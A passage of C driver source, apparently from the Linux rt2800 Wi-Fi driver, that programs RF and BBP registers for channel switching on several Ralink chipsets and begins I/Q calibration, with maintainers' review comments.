	rt2x00_set_field8(&rfcsr, RFCSR30_RX_H20M, txrx_h20m);
	rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);

	/* Band selection */
	rt2800_rfcsr_read(rt2x00dev, 36, &rfcsr);
	if (rf->channel <= 14)
		rt2x00_set_field8(&rfcsr, RFCSR36_RF_BS, 1);
	else
		rt2x00_set_field8(&rfcsr, RFCSR36_RF_BS, 0);
	rt2800_rfcsr_write(rt2x00dev, 36, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 34, &rfcsr);
	if (rf->channel <= 14)
		rfcsr = 0x3c;
	else
		rfcsr = 0x20;
	rt2800_rfcsr_write(rt2x00dev, 34, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 12, &rfcsr);
	if (rf->channel <= 14)
		rfcsr = 0x1a;
	else
		rfcsr = 0x12;
	rt2800_rfcsr_write(rt2x00dev, 12, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
	if (rf->channel >= 1 && rf->channel <= 14)
		rt2x00_set_field8(&rfcsr, RFCSR6_VCO_IC, 1);
	else if (rf->channel >= 36 && rf->channel <= 64)
		rt2x00_set_field8(&rfcsr, RFCSR6_VCO_IC, 2);
	else if (rf->channel >= 100 && rf->channel <= 128)
		rt2x00_set_field8(&rfcsr, RFCSR6_VCO_IC, 2);
	else
		rt2x00_set_field8(&rfcsr, RFCSR6_VCO_IC, 1);
	rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR30_RX_VCM, 2);
	rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);

	rt2800_rfcsr_write(rt2x00dev, 46, 0x60);

	if (rf->channel <= 14) {
		rt2800_rfcsr_write(rt2x00dev, 10, 0xd3);
		rt2800_rfcsr_write(rt2x00dev, 13, 0x12);
	} else {
		rt2800_rfcsr_write(rt2x00dev, 10, 0xd8);
		rt2800_rfcsr_write(rt2x00dev, 13, 0x23);
	}

	rt2800_rfcsr_read(rt2x00dev, 51, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR51_BITS01, 1);
	rt2800_rfcsr_write(rt2x00dev, 51, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 51, &rfcsr);
	if (rf->channel <= 14) {
		rt2x00_set_field8(&rfcsr, RFCSR51_BITS24, 5);
		rt2x00_set_field8(&rfcsr, RFCSR51_BITS57, 3);
	} else {
		rt2x00_set_field8(&rfcsr, RFCSR51_BITS24, 4);
		rt2x00_set_field8(&rfcsr, RFCSR51_BITS57, 2);
	}
	rt2800_rfcsr_write(rt2x00dev, 51, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 49, &rfcsr);
	if (rf->channel <= 14)
		rt2x00_set_field8(&rfcsr, RFCSR49_TX_LO1_IC, 3);
	else
		rt2x00_set_field8(&rfcsr, RFCSR49_TX_LO1_IC, 2);

	if (txbf_enabled)
		rt2x00_set_field8(&rfcsr, RFCSR49_TX_DIV, 1);

	rt2800_rfcsr_write(rt2x00dev, 49, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 50, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR50_TX_LO1_EN, 0);
	rt2800_rfcsr_write(rt2x00dev, 50, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 57, &rfcsr);
	if (rf->channel <= 14)
		rt2x00_set_field8(&rfcsr, RFCSR57_DRV_CC, 0x1b);
	else
		rt2x00_set_field8(&rfcsr, RFCSR57_DRV_CC, 0x0f);
	rt2800_rfcsr_write(rt2x00dev, 57, rfcsr);

	if (rf->channel <= 14) {
		rt2800_rfcsr_write(rt2x00dev, 44, 0x93);
		rt2800_rfcsr_write(rt2x00dev, 52, 0x45);
	} else {
		rt2800_rfcsr_write(rt2x00dev, 44, 0x9b);
		rt2800_rfcsr_write(rt2x00dev, 52, 0x05);
	}

	/* Initiate VCO calibration */
	rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
	if (rf->channel <= 14) {
		rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
	} else {
		rt2x00_set_field8(&rfcsr, RFCSR3_BIT1, 1);
		rt2x00_set_field8(&rfcsr, RFCSR3_BIT2, 1);
		rt2x00_set_field8(&rfcsr, RFCSR3_BIT3, 1);
		rt2x00_set_field8(&rfcsr, RFCSR3_BIT4, 1);
		rt2x00_set_field8(&rfcsr, RFCSR3_BIT5, 1);
		rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
	}
	rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);

	/* RF39/RF45 values depend on the channel sub-band. */
	if (rf->channel >= 1 && rf->channel <= 14) {
		rfcsr = 0x23;
		if (txbf_enabled)
			rt2x00_set_field8(&rfcsr, RFCSR39_RX_DIV, 1);
		rt2800_rfcsr_write(rt2x00dev, 39, rfcsr);

		rt2800_rfcsr_write(rt2x00dev, 45, 0xbb);
	} else if (rf->channel >= 36 && rf->channel <= 64) {
		rfcsr = 0x36;
		if (txbf_enabled)
			rt2x00_set_field8(&rfcsr, RFCSR39_RX_DIV, 1);
		rt2800_rfcsr_write(rt2x00dev, 39, rfcsr);

		rt2800_rfcsr_write(rt2x00dev, 45, 0xeb);
	} else if (rf->channel >= 100 && rf->channel <= 128) {
		rfcsr = 0x32;
		if (txbf_enabled)
			rt2x00_set_field8(&rfcsr, RFCSR39_RX_DIV, 1);
		rt2800_rfcsr_write(rt2x00dev, 39, rfcsr);

		rt2800_rfcsr_write(rt2x00dev, 45, 0xb3);
	} else {
		rfcsr = 0x30;
		if (txbf_enabled)
			rt2x00_set_field8(&rfcsr, RFCSR39_RX_DIV, 1);
		rt2800_rfcsr_write(rt2x00dev, 39, rfcsr);

		rt2800_rfcsr_write(rt2x00dev, 45, 0x9b);
	}
}
#define POWER_BOUND 0x27
#define POWER_BOUND_5G 0x2b
/*
 * Channel switch programming for the RF3290 chipset (2.4 GHz only).
 * Programs the PLL registers from the channel table entry, the bounded
 * TX power, the frequency offset and two channel-dependent BBP tweaks.
 */
static void rt2800_config_channel_rf3290(struct rt2x00_dev *rt2x00dev,
					 struct ieee80211_conf *conf,
					 struct rf_channel *rf,
					 struct channel_info *info)
{
	u8 reg;
	int pwr1 = info->default_power1;

	/* PLL programming from the rf_channel entry. */
	rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1);
	rt2800_rfcsr_write(rt2x00dev, 9, rf->rf3);

	rt2800_rfcsr_read(rt2x00dev, 11, &reg);
	rt2x00_set_field8(&reg, RFCSR11_R, rf->rf2);
	rt2800_rfcsr_write(rt2x00dev, 11, reg);

	/* TX power, clamped to the chipset bound. */
	if (pwr1 > POWER_BOUND)
		pwr1 = POWER_BOUND;
	rt2800_rfcsr_read(rt2x00dev, 49, &reg);
	rt2x00_set_field8(&reg, RFCSR49_TX, pwr1);
	rt2800_rfcsr_write(rt2x00dev, 49, reg);

	rt2800_adjust_freq_offset(rt2x00dev);

	if (rf->channel <= 14) {
		/* BBP 68 gets a special value on channel 6 only. */
		rt2800_bbp_write(rt2x00dev, 68,
				 rf->channel == 6 ? 0x0c : 0x0b);

		/* BBP 59 is stepped down across the channel range. */
		if (rf->channel >= 1 && rf->channel <= 6)
			rt2800_bbp_write(rt2x00dev, 59, 0x0f);
		else if (rf->channel >= 7 && rf->channel <= 11)
			rt2800_bbp_write(rt2x00dev, 59, 0x0e);
		else if (rf->channel >= 12 && rf->channel <= 14)
			rt2800_bbp_write(rt2x00dev, 59, 0x0d);
	}
}
/*
 * Channel switch programming for the RF3322 chipset (2x2, 2.4 GHz only).
 * Programs the PLL, both per-chain bounded TX power values, the frequency
 * offset and the chain power-down bits.
 */
static void rt2800_config_channel_rf3322(struct rt2x00_dev *rt2x00dev,
					 struct ieee80211_conf *conf,
					 struct rf_channel *rf,
					 struct channel_info *info)
{
	u8 reg;
	int pwr;

	/* PLL programming from the rf_channel entry. */
	rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1);
	rt2800_rfcsr_write(rt2x00dev, 9, rf->rf3);

	rt2800_rfcsr_write(rt2x00dev, 11, 0x42);
	rt2800_rfcsr_write(rt2x00dev, 12, 0x1c);
	rt2800_rfcsr_write(rt2x00dev, 13, 0x00);

	/* Per-chain TX power, clamped to the chipset bound. */
	pwr = info->default_power1;
	rt2800_rfcsr_write(rt2x00dev, 47, pwr > POWER_BOUND ? POWER_BOUND : pwr);

	pwr = info->default_power2;
	rt2800_rfcsr_write(rt2x00dev, 48, pwr > POWER_BOUND ? POWER_BOUND : pwr);

	rt2800_adjust_freq_offset(rt2x00dev);

	/* Chain 0 is always on; chain 1 only in a 2-chain configuration. */
	rt2800_rfcsr_read(rt2x00dev, 1, &reg);
	rt2x00_set_field8(&reg, RFCSR1_RX0_PD, 1);
	rt2x00_set_field8(&reg, RFCSR1_TX0_PD, 1);
	rt2x00_set_field8(&reg, RFCSR1_TX1_PD,
			  rt2x00dev->default_ant.tx_chain_num == 2);
	rt2x00_set_field8(&reg, RFCSR1_RX1_PD,
			  rt2x00dev->default_ant.rx_chain_num == 2);
	rt2x00_set_field8(&reg, RFCSR1_RX2_PD, 0);
	rt2x00_set_field8(&reg, RFCSR1_TX2_PD, 0);
	rt2800_rfcsr_write(rt2x00dev, 1, reg);

	/* NOTE(review): 80 is decimal here (= 0x50); the surrounding code
	 * uses hex throughout, so verify 0x80 was not intended.
	 */
	rt2800_rfcsr_write(rt2x00dev, 31, 80);
}
/*
 * Channel switch programming for the RF3070/RF53xx family
 * (RT5390/RT5392 and friends, 2.4 GHz).
 *
 * Programs the PLL from the channel table entry, the bounded per-chain
 * TX power, chain power-down bits and - depending on chip revision and
 * BT-coexistence capability - per-channel RF55/RF59 tuning tables.
 */
static void rt2800_config_channel_rf53xx(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
u8 rfcsr;
/* PLL programming from the rf_channel entry. */
rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1);
rt2800_rfcsr_write(rt2x00dev, 9, rf->rf3);
rt2800_rfcsr_read(rt2x00dev, 11, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR11_R, rf->rf2);
rt2800_rfcsr_write(rt2x00dev, 11, rfcsr);
/* Chain 0 TX power, clamped to POWER_BOUND. */
rt2800_rfcsr_read(rt2x00dev, 49, &rfcsr);
if (info->default_power1 > POWER_BOUND)
rt2x00_set_field8(&rfcsr, RFCSR49_TX, POWER_BOUND);
else
rt2x00_set_field8(&rfcsr, RFCSR49_TX, info->default_power1);
rt2800_rfcsr_write(rt2x00dev, 49, rfcsr);
/* RT5392 has a second TX chain; program its power as well. */
if (rt2x00_rt(rt2x00dev, RT5392)) {
rt2800_rfcsr_read(rt2x00dev, 50, &rfcsr);
if (info->default_power2 > POWER_BOUND)
rt2x00_set_field8(&rfcsr, RFCSR50_TX, POWER_BOUND);
else
rt2x00_set_field8(&rfcsr, RFCSR50_TX,
info->default_power2);
rt2800_rfcsr_write(rt2x00dev, 50, rfcsr);
}
/* Power up the RF block, PLL and the chains present on the chip. */
rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
if (rt2x00_rt(rt2x00dev, RT5392)) {
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 1);
}
rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_PLL_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 1);
rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);
rt2800_adjust_freq_offset(rt2x00dev);
if (rf->channel <= 14) {
/* Index into the per-channel tuning tables below. */
int idx = rf->channel-1;
if (rt2x00_has_cap_bt_coexist(rt2x00dev)) {
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F)) {
/* r55/r59 value array of channel 1~14 */
static const char r55_bt_rev[] = {0x83, 0x83,
0x83, 0x73, 0x73, 0x63, 0x53, 0x53,
0x53, 0x43, 0x43, 0x43, 0x43, 0x43};
static const char r59_bt_rev[] = {0x0e, 0x0e,
0x0e, 0x0e, 0x0e, 0x0b, 0x0a, 0x09,
0x07, 0x07, 0x07, 0x07, 0x07, 0x07};
rt2800_rfcsr_write(rt2x00dev, 55,
r55_bt_rev[idx]);
rt2800_rfcsr_write(rt2x00dev, 59,
r59_bt_rev[idx]);
} else {
/* Older revisions only tune RF59. */
static const char r59_bt[] = {0x8b, 0x8b, 0x8b,
0x8b, 0x8b, 0x8b, 0x8b, 0x8a, 0x89,
0x88, 0x88, 0x86, 0x85, 0x84};
rt2800_rfcsr_write(rt2x00dev, 59, r59_bt[idx]);
}
} else {
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F)) {
static const char r55_nonbt_rev[] = {0x23, 0x23,
0x23, 0x23, 0x13, 0x13, 0x03, 0x03,
0x03, 0x03, 0x03, 0x03, 0x03, 0x03};
static const char r59_nonbt_rev[] = {0x07, 0x07,
0x07, 0x07, 0x07, 0x07, 0x07, 0x07,
0x07, 0x07, 0x06, 0x05, 0x04, 0x04};
rt2800_rfcsr_write(rt2x00dev, 55,
r55_nonbt_rev[idx]);
rt2800_rfcsr_write(rt2x00dev, 59,
r59_nonbt_rev[idx]);
} else if (rt2x00_rt(rt2x00dev, RT5390) ||
rt2x00_rt(rt2x00dev, RT5392)) {
static const char r59_non_bt[] = {0x8f, 0x8f,
0x8f, 0x8f, 0x8f, 0x8f, 0x8f, 0x8d,
0x8a, 0x88, 0x88, 0x87, 0x87, 0x86};
rt2800_rfcsr_write(rt2x00dev, 59,
r59_non_bt[idx]);
}
}
}
}
/*
 * Channel switch programming for the RF5592 chipset (dual-band RT5592).
 *
 * Programs the LDO core voltage, the synthesizer (N, K, mod, R from the
 * rf_channel entry), a large set of band/sub-band dependent RF register
 * values, bounded TX power for both chains, chain power-down bits and
 * the band-dependent BBP/GLRT tables, then kicks a VCO calibration.
 *
 * Fixes vs. the previous revision: the mojibake "&reg" arguments are
 * restored, a stray comma operator after the RF55 write is now a proper
 * statement terminator, and hex constants use consistent lowercase "0x".
 */
static void rt2800_config_channel_rf55xx(struct rt2x00_dev *rt2x00dev,
					 struct ieee80211_conf *conf,
					 struct rf_channel *rf,
					 struct channel_info *info)
{
	u8 rfcsr, ep_reg;
	u32 reg;
	int power_bound;

	/* TODO */
	const bool is_11b = false;
	const bool is_type_ep = false;

	/* Raise the LDO core voltage for 5GHz or HT40 operation. */
	rt2800_register_read(rt2x00dev, LDO_CFG0, &reg);
	rt2x00_set_field32(&reg, LDO_CFG0_LDO_CORE_VLEVEL,
			   (rf->channel > 14 || conf_is_ht40(conf)) ? 5 : 0);
	rt2800_register_write(rt2x00dev, LDO_CFG0, reg);

	/* Order of values on rf_channel entry: N, K, mod, R */
	rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1 & 0xff);

	rt2800_rfcsr_read(rt2x00dev, 9, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR9_K, rf->rf2 & 0xf);
	rt2x00_set_field8(&rfcsr, RFCSR9_N, (rf->rf1 & 0x100) >> 8);
	rt2x00_set_field8(&rfcsr, RFCSR9_MOD, ((rf->rf3 - 8) & 0x4) >> 2);
	rt2800_rfcsr_write(rt2x00dev, 9, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 11, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR11_R, rf->rf4 - 1);
	rt2x00_set_field8(&rfcsr, RFCSR11_MOD, (rf->rf3 - 8) & 0x3);
	rt2800_rfcsr_write(rt2x00dev, 11, rfcsr);

	if (rf->channel <= 14) {
		rt2800_rfcsr_write(rt2x00dev, 10, 0x90);
		/* FIXME: RF11 overwrite ? */
		rt2800_rfcsr_write(rt2x00dev, 11, 0x4A);
		rt2800_rfcsr_write(rt2x00dev, 12, 0x52);
		rt2800_rfcsr_write(rt2x00dev, 13, 0x42);
		rt2800_rfcsr_write(rt2x00dev, 22, 0x40);
		rt2800_rfcsr_write(rt2x00dev, 24, 0x4A);
		rt2800_rfcsr_write(rt2x00dev, 25, 0x80);
		rt2800_rfcsr_write(rt2x00dev, 27, 0x42);
		rt2800_rfcsr_write(rt2x00dev, 36, 0x80);
		rt2800_rfcsr_write(rt2x00dev, 37, 0x08);
		rt2800_rfcsr_write(rt2x00dev, 38, 0x89);
		rt2800_rfcsr_write(rt2x00dev, 39, 0x1B);
		rt2800_rfcsr_write(rt2x00dev, 40, 0x0D);
		rt2800_rfcsr_write(rt2x00dev, 41, 0x9B);
		rt2800_rfcsr_write(rt2x00dev, 42, 0xD5);
		rt2800_rfcsr_write(rt2x00dev, 43, 0x72);
		rt2800_rfcsr_write(rt2x00dev, 44, 0x0E);
		rt2800_rfcsr_write(rt2x00dev, 45, 0xA2);
		rt2800_rfcsr_write(rt2x00dev, 46, 0x6B);
		rt2800_rfcsr_write(rt2x00dev, 48, 0x10);
		rt2800_rfcsr_write(rt2x00dev, 51, 0x3E);
		rt2800_rfcsr_write(rt2x00dev, 52, 0x48);
		rt2800_rfcsr_write(rt2x00dev, 54, 0x38);
		rt2800_rfcsr_write(rt2x00dev, 56, 0xA1);
		rt2800_rfcsr_write(rt2x00dev, 57, 0x00);
		rt2800_rfcsr_write(rt2x00dev, 58, 0x39);
		rt2800_rfcsr_write(rt2x00dev, 60, 0x45);
		rt2800_rfcsr_write(rt2x00dev, 61, 0x91);
		rt2800_rfcsr_write(rt2x00dev, 62, 0x39);

		/* TODO RF27 <- tssi */

		rfcsr = rf->channel <= 10 ? 0x07 : 0x06;
		rt2800_rfcsr_write(rt2x00dev, 23, rfcsr);
		rt2800_rfcsr_write(rt2x00dev, 59, rfcsr);

		if (is_11b) {
			/* CCK */
			rt2800_rfcsr_write(rt2x00dev, 31, 0xF8);
			rt2800_rfcsr_write(rt2x00dev, 32, 0xC0);
			if (is_type_ep)
				rt2800_rfcsr_write(rt2x00dev, 55, 0x06);
			else
				rt2800_rfcsr_write(rt2x00dev, 55, 0x47);
		} else {
			/* OFDM */
			if (is_type_ep)
				rt2800_rfcsr_write(rt2x00dev, 55, 0x03);
			else
				rt2800_rfcsr_write(rt2x00dev, 55, 0x43);
		}

		power_bound = POWER_BOUND;
		ep_reg = 0x2;
	} else {
		rt2800_rfcsr_write(rt2x00dev, 10, 0x97);
		/* FIXME: RF11 overwrite */
		rt2800_rfcsr_write(rt2x00dev, 11, 0x40);
		rt2800_rfcsr_write(rt2x00dev, 25, 0xBF);
		rt2800_rfcsr_write(rt2x00dev, 27, 0x42);
		rt2800_rfcsr_write(rt2x00dev, 36, 0x00);
		rt2800_rfcsr_write(rt2x00dev, 37, 0x04);
		rt2800_rfcsr_write(rt2x00dev, 38, 0x85);
		rt2800_rfcsr_write(rt2x00dev, 40, 0x42);
		rt2800_rfcsr_write(rt2x00dev, 41, 0xBB);
		rt2800_rfcsr_write(rt2x00dev, 42, 0xD7);
		rt2800_rfcsr_write(rt2x00dev, 45, 0x41);
		rt2800_rfcsr_write(rt2x00dev, 48, 0x00);
		rt2800_rfcsr_write(rt2x00dev, 57, 0x77);
		rt2800_rfcsr_write(rt2x00dev, 60, 0x05);
		rt2800_rfcsr_write(rt2x00dev, 61, 0x01);

		/* TODO RF27 <- tssi */

		if (rf->channel >= 36 && rf->channel <= 64) {
			rt2800_rfcsr_write(rt2x00dev, 12, 0x2E);
			rt2800_rfcsr_write(rt2x00dev, 13, 0x22);
			rt2800_rfcsr_write(rt2x00dev, 22, 0x60);
			rt2800_rfcsr_write(rt2x00dev, 23, 0x7F);
			if (rf->channel <= 50)
				rt2800_rfcsr_write(rt2x00dev, 24, 0x09);
			else if (rf->channel >= 52)
				rt2800_rfcsr_write(rt2x00dev, 24, 0x07);
			rt2800_rfcsr_write(rt2x00dev, 39, 0x1C);
			rt2800_rfcsr_write(rt2x00dev, 43, 0x5B);
			rt2800_rfcsr_write(rt2x00dev, 44, 0x40);
			rt2800_rfcsr_write(rt2x00dev, 46, 0x00);
			rt2800_rfcsr_write(rt2x00dev, 51, 0xFE);
			rt2800_rfcsr_write(rt2x00dev, 52, 0x0C);
			rt2800_rfcsr_write(rt2x00dev, 54, 0xF8);
			if (rf->channel <= 50) {
				rt2800_rfcsr_write(rt2x00dev, 55, 0x06);
				rt2800_rfcsr_write(rt2x00dev, 56, 0xD3);
			} else if (rf->channel >= 52) {
				rt2800_rfcsr_write(rt2x00dev, 55, 0x04);
				rt2800_rfcsr_write(rt2x00dev, 56, 0xBB);
			}

			rt2800_rfcsr_write(rt2x00dev, 58, 0x15);
			rt2800_rfcsr_write(rt2x00dev, 59, 0x7F);
			rt2800_rfcsr_write(rt2x00dev, 62, 0x15);
		} else if (rf->channel >= 100 && rf->channel <= 165) {
			rt2800_rfcsr_write(rt2x00dev, 12, 0x0E);
			rt2800_rfcsr_write(rt2x00dev, 13, 0x42);
			rt2800_rfcsr_write(rt2x00dev, 22, 0x40);
			if (rf->channel <= 153) {
				rt2800_rfcsr_write(rt2x00dev, 23, 0x3C);
				rt2800_rfcsr_write(rt2x00dev, 24, 0x06);
			} else if (rf->channel >= 155) {
				rt2800_rfcsr_write(rt2x00dev, 23, 0x38);
				rt2800_rfcsr_write(rt2x00dev, 24, 0x05);
			}
			if (rf->channel <= 138) {
				rt2800_rfcsr_write(rt2x00dev, 39, 0x1A);
				rt2800_rfcsr_write(rt2x00dev, 43, 0x3B);
				rt2800_rfcsr_write(rt2x00dev, 44, 0x20);
				rt2800_rfcsr_write(rt2x00dev, 46, 0x18);
			} else if (rf->channel >= 140) {
				rt2800_rfcsr_write(rt2x00dev, 39, 0x18);
				rt2800_rfcsr_write(rt2x00dev, 43, 0x1B);
				rt2800_rfcsr_write(rt2x00dev, 44, 0x10);
				rt2800_rfcsr_write(rt2x00dev, 46, 0x08);
			}
			if (rf->channel <= 124)
				rt2800_rfcsr_write(rt2x00dev, 51, 0xFC);
			else if (rf->channel >= 126)
				rt2800_rfcsr_write(rt2x00dev, 51, 0xEC);
			/* NOTE(review): the previous code wrote 0x06 for
			 * both the <= 138 and >= 140 cases, so the branch
			 * was collapsed; verify the >= 140 value was not
			 * meant to differ.
			 */
			rt2800_rfcsr_write(rt2x00dev, 52, 0x06);
			rt2800_rfcsr_write(rt2x00dev, 54, 0xEB);
			if (rf->channel <= 138)
				rt2800_rfcsr_write(rt2x00dev, 55, 0x01);
			else if (rf->channel >= 140)
				rt2800_rfcsr_write(rt2x00dev, 55, 0x00);
			if (rf->channel <= 128)
				rt2800_rfcsr_write(rt2x00dev, 56, 0xBB);
			else if (rf->channel >= 130)
				rt2800_rfcsr_write(rt2x00dev, 56, 0xAB);
			if (rf->channel <= 116)
				rt2800_rfcsr_write(rt2x00dev, 58, 0x1D);
			else if (rf->channel >= 118)
				rt2800_rfcsr_write(rt2x00dev, 58, 0x15);
			if (rf->channel <= 138)
				rt2800_rfcsr_write(rt2x00dev, 59, 0x3F);
			else if (rf->channel >= 140)
				rt2800_rfcsr_write(rt2x00dev, 59, 0x7C);
			if (rf->channel <= 116)
				rt2800_rfcsr_write(rt2x00dev, 62, 0x1D);
			else if (rf->channel >= 118)
				rt2800_rfcsr_write(rt2x00dev, 62, 0x15);
		}

		power_bound = POWER_BOUND_5G;
		ep_reg = 0x3;
	}

	/* Per-chain TX power, clamped to the band-specific bound. */
	rt2800_rfcsr_read(rt2x00dev, 49, &rfcsr);
	if (info->default_power1 > power_bound)
		rt2x00_set_field8(&rfcsr, RFCSR49_TX, power_bound);
	else
		rt2x00_set_field8(&rfcsr, RFCSR49_TX, info->default_power1);
	if (is_type_ep)
		rt2x00_set_field8(&rfcsr, RFCSR49_EP, ep_reg);
	rt2800_rfcsr_write(rt2x00dev, 49, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 50, &rfcsr);
	if (info->default_power2 > power_bound)
		rt2x00_set_field8(&rfcsr, RFCSR50_TX, power_bound);
	else
		rt2x00_set_field8(&rfcsr, RFCSR50_TX, info->default_power2);
	if (is_type_ep)
		rt2x00_set_field8(&rfcsr, RFCSR50_EP, ep_reg);
	rt2800_rfcsr_write(rt2x00dev, 50, rfcsr);

	/* Enable the RF block/PLL and the configured chains. */
	rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
	rt2x00_set_field8(&rfcsr, RFCSR1_PLL_PD, 1);

	rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD,
			  rt2x00dev->default_ant.tx_chain_num >= 1);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD,
			  rt2x00dev->default_ant.tx_chain_num == 2);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 0);

	rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD,
			  rt2x00dev->default_ant.rx_chain_num >= 1);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD,
			  rt2x00dev->default_ant.rx_chain_num == 2);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 0);

	rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);

	rt2800_rfcsr_write(rt2x00dev, 6, 0xe4);

	if (conf_is_ht40(conf))
		rt2800_rfcsr_write(rt2x00dev, 30, 0x16);
	else
		rt2800_rfcsr_write(rt2x00dev, 30, 0x10);

	if (!is_11b) {
		rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
		rt2800_rfcsr_write(rt2x00dev, 32, 0x80);
	}

	/* TODO proper frequency adjustment */
	rt2800_adjust_freq_offset(rt2x00dev);

	/* TODO merge with others */
	rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
	rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);

	/* BBP settings */
	rt2800_bbp_write(rt2x00dev, 62, 0x37 - rt2x00dev->lna_gain);
	rt2800_bbp_write(rt2x00dev, 63, 0x37 - rt2x00dev->lna_gain);
	rt2800_bbp_write(rt2x00dev, 64, 0x37 - rt2x00dev->lna_gain);

	rt2800_bbp_write(rt2x00dev, 79, (rf->channel <= 14) ? 0x1C : 0x18);
	rt2800_bbp_write(rt2x00dev, 80, (rf->channel <= 14) ? 0x0E : 0x08);
	rt2800_bbp_write(rt2x00dev, 81, (rf->channel <= 14) ? 0x3A : 0x38);
	rt2800_bbp_write(rt2x00dev, 82, (rf->channel <= 14) ? 0x62 : 0x92);

	/* GLRT band configuration */
	rt2800_bbp_write(rt2x00dev, 195, 128);
	rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0xE0 : 0xF0);
	rt2800_bbp_write(rt2x00dev, 195, 129);
	rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x1F : 0x1E);
	rt2800_bbp_write(rt2x00dev, 195, 130);
	rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x38 : 0x28);
	rt2800_bbp_write(rt2x00dev, 195, 131);
	rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x32 : 0x20);
	rt2800_bbp_write(rt2x00dev, 195, 133);
	rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x28 : 0x7F);
	rt2800_bbp_write(rt2x00dev, 195, 124);
	rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x19 : 0x7F);
}
/*
 * Write a BBP register once per active RX chain: BBP 27 selects the
 * chain the subsequent write targets, so the value is replicated by
 * stepping BBP27_RX_CHAIN_SEL through 0..rx_chain_num-1.
 *
 * Fix vs. the previous revision: the mojibake "&reg" arguments of the
 * BBP 27 read-modify-write are restored.
 */
static void rt2800_bbp_write_with_rx_chain(struct rt2x00_dev *rt2x00dev,
					   const unsigned int word,
					   const u8 value)
{
	u8 chain, reg;

	for (chain = 0; chain < rt2x00dev->default_ant.rx_chain_num; chain++) {
		rt2800_bbp_read(rt2x00dev, 27, &reg);
		rt2x00_set_field8(&reg, BBP27_RX_CHAIN_SEL, chain);
		rt2800_bbp_write(rt2x00dev, 27, reg);

		rt2800_bbp_write(rt2x00dev, word, value);
	}
}
/*
 * Map a channel number to the matching per-band EEPROM calibration byte.
 * The four word arguments are the EEPROM offsets for the 2.4GHz band and
 * the three 5GHz sub-bands; channels outside every range yield 0.
 */
static u8 rt2800_iq_cal_eeprom_byte(struct rt2x00_dev *rt2x00dev, int channel,
				    unsigned int word_2g,
				    unsigned int word_ch36_to_ch64,
				    unsigned int word_ch100_to_ch138,
				    unsigned int word_ch140_to_ch165)
{
	if (channel <= 14)
		return rt2x00_eeprom_byte(rt2x00dev, word_2g);
	if (channel >= 36 && channel <= 64)
		return rt2x00_eeprom_byte(rt2x00dev, word_ch36_to_ch64);
	if (channel >= 100 && channel <= 138)
		return rt2x00_eeprom_byte(rt2x00dev, word_ch100_to_ch138);
	if (channel >= 140 && channel <= 165)
		return rt2x00_eeprom_byte(rt2x00dev, word_ch140_to_ch165);
	return 0;
}

/*
 * Program the TX I/Q gain/phase calibration for the given channel.
 * BBP 158/159 form an indirect register pair: 158 selects the
 * calibration register, 159 carries the value read from the EEPROM.
 * The four copy-pasted channel-range chains of the previous revision
 * are folded into rt2800_iq_cal_eeprom_byte().
 */
static void rt2800_iq_calibrate(struct rt2x00_dev *rt2x00dev, int channel)
{
	u8 cal;

	/* TX0 IQ Gain */
	rt2800_bbp_write(rt2x00dev, 158, 0x2c);
